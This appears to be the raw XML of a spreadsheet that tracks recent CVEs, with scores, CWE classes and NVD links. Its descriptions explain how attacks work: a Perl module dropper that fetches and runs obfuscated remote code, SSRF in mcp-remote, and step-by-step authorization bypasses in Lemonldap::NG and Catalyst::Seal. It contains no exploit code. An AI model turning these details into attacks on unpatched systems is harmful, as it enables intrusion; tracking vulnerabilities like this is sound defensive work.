    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T753" r:id="rId752"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T754" r:id="rId753"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T755" r:id="rId754"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T756" r:id="rId755"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T757" r:id="rId756"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T758" r:id="rId757"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T759" r:id="rId758"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T760" r:id="rId759"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T761" r:id="rId760"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T762" r:id="rId761"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T763" r:id="rId762"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T764" r:id="rId763"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T765" r:id="rId764"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T766" r:id="rId765"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T767" r:id="rId766"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T768" r:id="rId767"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T769" r:id="rId768"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T770" r:id="rId769"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T771" r:id="rId770"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T772" r:id="rId771"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T773" r:id="rId772"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T774" r:id="rId773"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T775" r:id="rId774"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T776" r:id="rId775"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T777" r:id="rId776"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T778" r:id="rId777"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T779" r:id="rId778"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T780" r:id="rId779"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T781" r:id="rId780"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T782" r:id="rId781"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T783" r:id="rId78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Updated - CVSS added</t>
        </is>
      </c>
      <c r="C2" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88351</t>
        </is>
      </c>
      <c r="D2" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E2" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F2" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G2" s="5" t="inlineStr"/>
      <c r="H2" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I2" s="5" t="inlineStr"/>
      <c r="J2" s="5" t="inlineStr"/>
      <c r="K2" s="5" t="inlineStr"/>
      <c r="L2" s="5" t="inlineStr"/>
      <c r="M2" s="5" t="inlineStr"/>
      <c r="N2" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O2" s="5" t="inlineStr">
        <is>
          <t>2026-09-24</t>
        </is>
      </c>
      <c r="P2" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q2" s="5" t="inlineStr"/>
      <c r="R2" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="S2" s="5" t="inlineStr">
        <is>
          <t>An integer overflow vulnerability exists in the MPack Node API in MPack 1.1.1 on 32-bit platforms. When parsing a specially crafted MessagePack array32 or map32 object with an excessively large element count, the page allocation size calculation in mpack_tree_parse_children() can overflow size_t and produce an undersized allocation. Subsequent parsing writes mpack_node_data_t records beyond the allocated heap buffer, resulting in heap-buffer-overflow, memory corruption, and denial of service.</t>
        </is>
      </c>
      <c r="T2" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88351</t>
        </is>
      </c>
    </row>
    <row r="3">
      <c r="A3" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B3" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C3" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97230</t>
        </is>
      </c>
      <c r="D3" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E3" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F3" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G3" s="5" t="inlineStr"/>
      <c r="H3" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I3" s="5" t="inlineStr"/>
      <c r="J3" s="5" t="inlineStr">
        <is>
          <t>f5, python</t>
        </is>
      </c>
      <c r="K3" s="5" t="inlineStr"/>
      <c r="L3" s="5" t="inlineStr"/>
      <c r="M3" s="5" t="inlineStr"/>
      <c r="N3" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O3" s="5" t="inlineStr">
        <is>
          <t>2026-09-24</t>
        </is>
      </c>
      <c r="P3" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q3" s="5" t="inlineStr"/>
      <c r="R3" s="5" t="inlineStr">
        <is>
          <t>CWE-506</t>
        </is>
      </c>
      <c r="S3" s="5" t="inlineStr">
        <is>
          <t>IO::Socket::SSL::SelfCertificate versions 1.00 for Perl contains malware which executes Python code from an obfuscated URL.
The generate_certificate runs a Python script saved as a certificate file.  The pyhton script attempts to retrieve code from a hardcoded http URL that is obfuscated with base64 encoding and run the response body directly.
The impact is that arbitrary code can be invoked as the user, without a dropped script being saved on the affected host.
The releases have no test scripts nor build hooks.  The intention may have been to trigger the payload after installation.
The dropper script is in lib/Crypt/SelfCertificate/sample/cert.pem.
This is similar to CVE-2026-95831 for the module Crypt::SelfCertificate.
The SHA-256 digests of the files are
    ba24ee8ec3b7f47f65bed62e16fb413ace50653cf44bd8ea90914390922831e0  IO-Socket-SSL-SelfCertificate-1.00.tar.gz
    821d38830e5eb8607738421c25ac25f59fff02a6ab67daa32fbd020429454dac  IO-Socket-SSL-SelfCertificate-1.00/lib/IO/Socket/SSL/SelfCertificate/sample/cert.pem
    d483cb7b23b7271cb11cf242bff4a2e1c02df0b9525eb0429abeea8961c399d5  IO-Socket-SSL-SelfCertificate-1.00-upload.tar.gz</t>
        </is>
      </c>
      <c r="T3" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97230</t>
        </is>
      </c>
    </row>
    <row r="4">
      <c r="A4" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B4" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C4" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-51994</t>
        </is>
      </c>
      <c r="D4" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E4" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F4" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G4" s="5" t="inlineStr"/>
      <c r="H4" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I4" s="5" t="inlineStr"/>
      <c r="J4" s="5" t="inlineStr"/>
      <c r="K4" s="5" t="inlineStr"/>
      <c r="L4" s="5" t="inlineStr"/>
      <c r="M4" s="5" t="inlineStr"/>
      <c r="N4" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O4" s="5" t="inlineStr">
        <is>
          <t>2026-09-24</t>
        </is>
      </c>
      <c r="P4" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q4" s="5" t="inlineStr"/>
      <c r="R4" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S4" s="5" t="inlineStr">
        <is>
          <t>mcp-remote versions 0.1.32 through 0.1.38 are vulnerable to Server-Side Request Forgery (SSRF) via the resource_metadata URL extracted from a remote MCP server's WWW-Authenticate header</t>
        </is>
      </c>
      <c r="T4" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-51994</t>
        </is>
      </c>
    </row>
    <row r="5">
      <c r="A5" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B5" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C5" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92288</t>
        </is>
      </c>
      <c r="D5" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E5" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F5" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G5" s="5" t="inlineStr"/>
      <c r="H5" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I5" s="5" t="inlineStr"/>
      <c r="J5" s="5" t="inlineStr"/>
      <c r="K5" s="5" t="inlineStr"/>
      <c r="L5" s="5" t="inlineStr"/>
      <c r="M5" s="5" t="inlineStr"/>
      <c r="N5" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O5" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P5" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q5" s="5" t="inlineStr"/>
      <c r="R5" s="5" t="inlineStr">
        <is>
          <t>CWE-1390</t>
        </is>
      </c>
      <c r="S5" s="5" t="inlineStr">
        <is>
          <t>Lemonldap::NG::Portal versions from 2.20.0 before 2.21.6, from 2.22.0 before 2.23.4 for Perl allow unauthenticated OAuth2 token introspection because checkEndPointAuthenticationCredentials does not verify the client secret of a public Relying Party.
checkEndPointAuthenticationCredentials() skips the secret comparison for a Relying Party marked public and still returns the authentication method deduced from the request, client_secret_basic or client_secret_post. introspection() rejects a caller only when that method is missing or none, so a request carrying a public client_id and an arbitrary or empty secret passes the endpoint's authentication check.
An attacker who holds an access token and knows the client_id of any public Relying Party can confirm the token is active and read its metadata, including scope, audience, expiry and the sub claim. The sub claim is computed with the calling Relying Party's user identifier attribute, so an attacker can translate a user identifier from one Relying Party to another, defeating per-client and pseudonymous identifiers.</t>
        </is>
      </c>
      <c r="T5" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92288</t>
        </is>
      </c>
    </row>
    <row r="6">
      <c r="A6" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B6" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C6" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-51997</t>
        </is>
      </c>
      <c r="D6" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E6" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F6" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G6" s="5" t="inlineStr"/>
      <c r="H6" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I6" s="5" t="inlineStr"/>
      <c r="J6" s="5" t="inlineStr"/>
      <c r="K6" s="5" t="inlineStr"/>
      <c r="L6" s="5" t="inlineStr"/>
      <c r="M6" s="5" t="inlineStr"/>
      <c r="N6" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O6" s="5" t="inlineStr">
        <is>
          <t>2026-09-24</t>
        </is>
      </c>
      <c r="P6" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q6" s="5" t="inlineStr"/>
      <c r="R6" s="5" t="inlineStr">
        <is>
          <t>CWE-20, CWE-918, CWE-94</t>
        </is>
      </c>
      <c r="S6" s="5" t="inlineStr">
        <is>
          <t>An issue in geelen mcp-remote 0.1.16 through 0.1.38 allows a remote attacker to execute arbitrary code via the open() functions</t>
        </is>
      </c>
      <c r="T6" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-51997</t>
        </is>
      </c>
    </row>
    <row r="7">
      <c r="A7" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B7" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C7" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85491</t>
        </is>
      </c>
      <c r="D7" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E7" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F7" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G7" s="5" t="inlineStr"/>
      <c r="H7" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I7" s="5" t="inlineStr"/>
      <c r="J7" s="5" t="inlineStr"/>
      <c r="K7" s="5" t="inlineStr"/>
      <c r="L7" s="5" t="inlineStr"/>
      <c r="M7" s="5" t="inlineStr"/>
      <c r="N7" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O7" s="5" t="inlineStr">
        <is>
          <t>2026-09-24</t>
        </is>
      </c>
      <c r="P7" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q7" s="5" t="inlineStr"/>
      <c r="R7" s="5" t="inlineStr">
        <is>
          <t>CWE-1023, CWE-706</t>
        </is>
      </c>
      <c r="S7" s="5" t="inlineStr">
        <is>
          <t>Catalyst::Seal versions before 0.03 for Perl allow one request to disable a path or route a later one past an authorization check via a dispatch memo keyed on the request path alone.
Catalyst::Seal replaces the dispatcher's prepare_action with a version that memoises how a path resolved: which dispatch type matched, at which level, and what was left over as arguments. The key is the request path and nothing else. Action roles that match on the method, content type, scheme or query make that resolution depend on state the key does not carry, so the memo answers for a request it was not built from.
A path that resolves to no action is memoised as well, and replaying that entry returns without consulting any dispatch type, so no action is set and the request fails. A GET of a path whose action is declared POST-only therefore disables that path for every later request, the correct POST included. An entry that did resolve replays the level the earlier descent reached. Where a POST-only action sits below a shallower action on the same path, a GET memoises the shallow route, and a later POST is dispatched there with an auto() guarding the deeper controller never running.
The memo is cleared only when an action is registered, which happens at setup, so an entry lasts for the life of the process, and its cap of 2048 entries bounds how many paths one caller can disable. In the configuration measured, the misroute lands on the less privileged action, so it is an authorization check not running rather than a privilege gain.</t>
        </is>
      </c>
      <c r="T7" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85491</t>
        </is>
      </c>
    </row>
    <row r="8">
      <c r="A8" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B8" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C8" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88361</t>
        </is>
      </c>
      <c r="D8" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E8" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F8" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G8" s="5" t="inlineStr"/>
      <c r="H8" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I8" s="5" t="inlineStr"/>
      <c r="J8" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K8" s="5" t="inlineStr"/>
      <c r="L8" s="5" t="inlineStr"/>
      <c r="M8" s="5" t="inlineStr"/>
      <c r="N8" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O8" s="5" t="inlineStr">
        <is>
          <t>2026-09-24</t>
        </is>
      </c>
      <c r="P8" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q8" s="5" t="inlineStr"/>
      <c r="R8" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="S8" s="5" t="inlineStr">
        <is>
          <t>SumatraPDF 3.6.1 contains an integer overflow vulnerability in EngineMupdf::BuildPageLabelRec() when parsing PDF PageLabels /Nums entries.</t>
        </is>
      </c>
      <c r="T8" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88361</t>
        </is>
      </c>
    </row>
    <row r="9">
      <c r="A9" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B9" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C9" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88362</t>
        </is>
      </c>
      <c r="D9" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E9" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F9" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G9" s="5" t="inlineStr"/>
      <c r="H9" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I9" s="5" t="inlineStr"/>
      <c r="J9" s="5" t="inlineStr"/>
      <c r="K9" s="5" t="inlineStr"/>
      <c r="L9" s="5" t="inlineStr"/>
      <c r="M9" s="5" t="inlineStr"/>
      <c r="N9" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O9" s="5" t="inlineStr">
        <is>
          <t>2026-09-24</t>
        </is>
      </c>
      <c r="P9" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q9" s="5" t="inlineStr"/>
      <c r="R9" s="5" t="inlineStr">
        <is>
          <t>CWE-681</t>
        </is>
      </c>
      <c r="S9" s="5" t="inlineStr">
        <is>
          <t>MuJS e892c9fdb contains an incorrect numeric conversion vulnerability in jsR_isindex() in jsrun.c. A specially crafted JavaScript input containing an excessively large numeric array index can cause an out-of-range floating-point value to be converted to an integer without proper range validation. This results in undefined behavior and can cause process termination, leading to denial of service.</t>
        </is>
      </c>
      <c r="T9" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88362</t>
        </is>
      </c>
    </row>
    <row r="10">
      <c r="A10" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B10" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C10" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88373</t>
        </is>
      </c>
      <c r="D10" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E10" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F10" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G10" s="5" t="inlineStr"/>
      <c r="H10" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I10" s="5" t="inlineStr"/>
      <c r="J10" s="5" t="inlineStr"/>
      <c r="K10" s="5" t="inlineStr"/>
      <c r="L10" s="5" t="inlineStr"/>
      <c r="M10" s="5" t="inlineStr"/>
      <c r="N10" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O10" s="5" t="inlineStr">
        <is>
          <t>2026-09-24</t>
        </is>
      </c>
      <c r="P10" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q10" s="5" t="inlineStr"/>
      <c r="R10" s="5" t="inlineStr">
        <is>
          <t>CWE-476</t>
        </is>
      </c>
      <c r="S10" s="5" t="inlineStr">
        <is>
          <t>libde265 commit 4d45a6b contains a NULL pointer dereference vulnerability in the NAL parsing path. When de265_push_NAL() is called with a zero-length NAL unit, the resulting NAL_unit may retain a NULL backing buffer, which is subsequently passed as the destination argument to memcpy() in NAL_unit::set_data(). Although the copy length is zero, this violates the nonnull requirement of memcpy() and results in undefined behavior, causing process termination in UBSan-instrumented builds and denial of service.</t>
        </is>
      </c>
      <c r="T10" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88373</t>
        </is>
      </c>
    </row>
    <row r="11">
      <c r="A11" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B11" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C11" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88388</t>
        </is>
      </c>
      <c r="D11" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E11" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F11" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G11" s="5" t="inlineStr"/>
      <c r="H11" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I11" s="5" t="inlineStr"/>
      <c r="J11" s="5" t="inlineStr"/>
      <c r="K11" s="5" t="inlineStr"/>
      <c r="L11" s="5" t="inlineStr"/>
      <c r="M11" s="5" t="inlineStr"/>
      <c r="N11" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O11" s="5" t="inlineStr">
        <is>
          <t>2026-09-24</t>
        </is>
      </c>
      <c r="P11" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q11" s="5" t="inlineStr"/>
      <c r="R11" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="S11" s="5" t="inlineStr">
        <is>
          <t>Espruino 2v29 (commit bffc6d0) contains a stack-based buffer overflow vulnerability in the JavaScript error stack-trace handling path on 64-bit builds. A remote attacker can supply JavaScript input that triggers an exception and reaches jslPrintTokenLineMarker(), which passes the address of a 4-byte int column variable to jsvGetLineAndCol() as a size_t pointer. jsvGetLineAndCol() performs an 8-byte write through the mismatched pointer, overwriting adjacent stack memory.</t>
        </is>
      </c>
      <c r="T11" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88388</t>
        </is>
      </c>
    </row>
    <row r="12">
      <c r="A12" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B12" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C12" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88369</t>
        </is>
      </c>
      <c r="D12" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E12" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F12" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G12" s="5" t="inlineStr"/>
      <c r="H12" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I12" s="5" t="inlineStr"/>
      <c r="J12" s="5" t="inlineStr"/>
      <c r="K12" s="5" t="inlineStr"/>
      <c r="L12" s="5" t="inlineStr"/>
      <c r="M12" s="5" t="inlineStr"/>
      <c r="N12" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O12" s="5" t="inlineStr">
        <is>
          <t>2026-09-24</t>
        </is>
      </c>
      <c r="P12" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q12" s="5" t="inlineStr"/>
      <c r="R12" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S12" s="5" t="inlineStr">
        <is>
          <t>zserge jsmn commit 25647e6 is vulnerable to Buffer Overflow in example/jsondump.c dump().</t>
        </is>
      </c>
      <c r="T12" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88369</t>
        </is>
      </c>
    </row>
    <row r="13">
      <c r="A13" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B13" s="5" t="inlineStr">
        <is>
          <t>Updated - Fix/version updated</t>
        </is>
      </c>
      <c r="C13" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53493</t>
        </is>
      </c>
      <c r="D13" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="E13" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F13" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G13" s="5" t="inlineStr"/>
      <c r="H13" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I13" s="5" t="inlineStr"/>
      <c r="J13" s="5" t="inlineStr">
        <is>
          <t>github, go</t>
        </is>
      </c>
      <c r="K13" s="5" t="inlineStr"/>
      <c r="L13" s="5" t="inlineStr">
        <is>
          <t>go:github.com/containerd/containerd, go:github.com/containerd/containerd/v2</t>
        </is>
      </c>
      <c r="M13" s="5" t="inlineStr">
        <is>
          <t>1.7.36, 2.0.13, 2.2.9, 2.3.6, 2.4.1</t>
        </is>
      </c>
      <c r="N13" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O13" s="5" t="inlineStr"/>
      <c r="P13" s="5" t="inlineStr"/>
      <c r="Q13" s="5" t="inlineStr"/>
      <c r="R13" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-770, CWE-834</t>
        </is>
      </c>
      <c r="S13" s="5" t="inlineStr">
        <is>
          <t>### Impact
A vulnerability exists in containerd's image pull handlers where a crafted OCI image index containing deeply nested or heavily fanned-out descriptor graphs can cause unbounded CPU and memory consumption. During the `PullImage` operation, the recursive traversal and processing of child descriptors lack sufficient depth and breadth limits, and fail to adequately deduplicate identical descriptors. This unbounded traversal leads to excessive resource allocation.
Consequently, pulling a malicious image reference can result in prolonged stalls during container creation and significant resource pressure on the host system. This issue occurs entirely during the image pull phase, prior to any container execution.
### Patches
This bug has been fixed in containerd 2.4.1, 2.3.6, 2.2.9, 2.0.13, and 1.7.36. Users should update to these versions to resolve the issue.
### Workarounds
There are no known workarounds for this issue. Users are advised to only pull trusted images from known registries until the patch can be applied.
### Credits
The containerd project would like to thank Jakub Ciolek at ElevenLabs and @jlgore who independently discovered and responsibly disclosed this issue in accordance with the [containerd security policy](https://github.com/containerd/project/blob/main/SECURITY.md).
### For more information
If you have any questions or comments about this advisory:
* Open an issue in [containerd](https://github.com/containerd/containerd/issues/new/choose)
* Email us at [security@containerd.io](mailto:security@containerd.io)
To report a security issue in containerd:
* [Report a new vulnerability](https://github.com/containerd/containerd/security/advisories/new)
* Email us at [security@containerd.io](mailto:security@containerd.io)</t>
        </is>
      </c>
      <c r="T13" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53493</t>
        </is>
      </c>
    </row>
    <row r="14">
      <c r="A14" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B14" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C14" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88359</t>
        </is>
      </c>
      <c r="D14" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E14" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F14" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G14" s="5" t="inlineStr"/>
